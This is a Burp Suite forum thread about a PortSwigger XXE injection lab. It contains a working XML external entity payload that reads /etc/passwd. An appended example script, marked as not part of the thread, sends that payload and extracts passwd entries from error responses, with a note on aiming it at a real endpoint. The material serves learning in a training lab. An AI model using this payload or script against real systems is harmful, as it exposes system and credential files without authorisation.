Burp Suite User Forum

Error in XXE Injection Lab

Elliot | Last updated: Mar 25, 2020 12:17PM UTC

I just came across a problem while attempting the first XXE Injection lab. In the first lab, you have to define an entity and use it to retrieve the /etc/passwd file. I submitted the following payload:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

But I don't get the /etc/passwd file. I checked the solution and I'm sure I'm doing everything correctly (well, I think). The part that confuses me the most is the fact that I still solved the lab :/ What exactly am I doing wrong here?

Michelle, PortSwigger Agent | Last updated: Mar 25, 2020 02:56PM UTC

Did you intercept the response so you could analyze it in Burp?

Elliot | Last updated: Mar 26, 2020 11:51AM UTC

Sorry for the late reply; I analyzed the response in Burp and it worked. I wasn't aware it wouldn't work in the browser. Why's that though?

Michelle, PortSwigger Agent | Last updated: Mar 26, 2020 01:36PM UTC

The web page you see in your browser is designed so that if the HTTP response code is anything other than 200 OK, the response will not be displayed as part of the page; you will just see the message "Could not fetch stock levels!". If you look at the response when you perform 'Check stock' for an item without editing the request, you'll see it is a 200 OK response, so the stock level displays in your browser. When you insert the external entity definition, the response is an HTTP 400 Bad Request, so the page in your browser does not display the information and shows "Could not fetch stock levels!" instead. When you analyze the HTTP 400 response, though, you can see the /etc/passwd file contents.
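The behaviour described above, as an added example that is not part of the original thread or of the lab's own code: a small script that builds the same stock-check payload, sends it, and keeps the raw status and body, alongside a model of the front-end logic that only renders a body on 200 OK. Every function name (buildXxePayload, checkStock, renderStockLevel, extractPasswdLines, fakeLabServer) and the embedded 400 response are assumptions constructed for this example; the URL and the "/product/stock" path are placeholders.

```javascript
// Added example, not code from the lab or from PortSwigger.
// Shows why the rendered page hides the result: the lab's front end only
// displays the response body when the status is 200 OK, so a 400 Bad Request
// that still carries /etc/passwd in its body is replaced by an error message.

const STOCK_ERROR = "Could not fetch stock levels!";

// Build the stockCheck XML with productId replaced by the external entity.
// Reproduces the payload from the first post for the given storeId and URI.
function buildXxePayload(storeId, uri) {
  return (
    '<?xml version="1.0" encoding="UTF-8"?>' +
    '<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "' + uri + '">]>' +
    "<stockCheck><productId>&xxe;</productId>" +
    "<storeId>" + storeId + "</storeId></stockCheck>"
  );
}

// POST the XML and return status and body regardless of the status code.
// fetchImpl is injected so the function runs offline against a fake; pass the
// global fetch (Node 18+ or a browser) to hit a real endpoint.
async function checkStock(fetchImpl, url, xml) {
  const res = await fetchImpl(url, {
    method: "POST",
    headers: { "Content-Type": "application/xml" },
    body: xml,
  });
  return { status: res.status, body: await res.text() };
}

// Model of the lab's front end: render the body only on 200 OK, otherwise
// show the generic error. This is what the browser tab displays.
function renderStockLevel(response) {
  return response.status === 200 ? response.body : STOCK_ERROR;
}

// Pull passwd-format entries (name:pw:uid:gid:gecos:home:shell) out of an
// arbitrary error body, so leaked file content is visible even when the
// server wraps it in a message.
function extractPasswdLines(body) {
  const re = /[A-Za-z0-9_-]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*/g;
  return body.match(re) || [];
}

// Constructed stand-in for the lab server (not a captured response): a normal
// stock check returns 200 with a number, a payload carrying a DOCTYPE returns
// 400 with the expanded entity echoed in the error text.
function fakeLabServer(url, opts) {
  const hasDoctype = opts.body.includes("<!DOCTYPE");
  const body = hasDoctype
    ? "Invalid product ID: root:x:0:0:root:/root:/bin/bash\n" +
      "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    : "42";
  return Promise.resolve({
    status: hasDoctype ? 400 : 200,
    text: () => Promise.resolve(body),
  });
}

// Send the XXE payload and return both views of the result: what the page
// would show and what a proxy such as Burp would show.
async function demo(fetchImpl, url) {
  const xml = buildXxePayload(1, "file:///etc/passwd");
  const raw = await checkStock(fetchImpl, url, xml);
  return {
    rendered: renderStockLevel(raw),
    raw,
    leaked: extractPasswdLines(raw.body),
  };
}

// Stand-alone run against the fake server (placeholder URL).
demo(fakeLabServer, "http://lab.example/product/stock").then((r) =>
  console.log(JSON.stringify(r, null, 2))
);
```

Against the fake, `rendered` is "Could not fetch stock levels!" while `raw.body` and `leaked` contain the passwd entries, which is exactly the gap between the browser view and the Burp view described above. To run it against a real lab instance, replace fakeLabServer with the global `fetch` and the placeholder URL with the lab's stock endpoint; the point of keeping `checkStock` status-agnostic is that it never discards a non-200 body.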
